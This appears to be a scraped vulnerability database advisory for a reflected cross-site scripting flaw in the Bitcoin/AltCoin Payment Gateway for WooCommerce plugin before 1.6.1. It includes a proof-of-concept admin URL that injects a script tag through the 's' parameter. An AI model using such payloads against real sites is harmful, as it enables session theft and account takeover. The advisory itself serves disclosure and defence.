Lucene search

K
wpexploitApple502jWPEX-ID:7C6C0AAC-1733-4ABC-8E95-05416636A127
HistorySep 06, 2021 - 12:00 a.m.

Bitcoin / AltCoin Payment Gateway for WooCommerce < 1.6.1 - Reflected Cross-Site Scripting

2021-09-0600:00:00
apple502j
312

0.001 Low

EPSS

Percentile

43.2%

The plugin does not escape the ‘s’ GET parameter before outputting back in the All Masking Rules page, leading to a Reflected Cross-Site Scripting issue

https://example.com/wp-admin/admin.php?page=cs-woo-altcoin-all-coins&s="><script>alert(/XSS/)</script>

0.001 Low

EPSS

Percentile

43.2%

Related for WPEX-ID:7C6C0AAC-1733-4ABC-8E95-05416636A127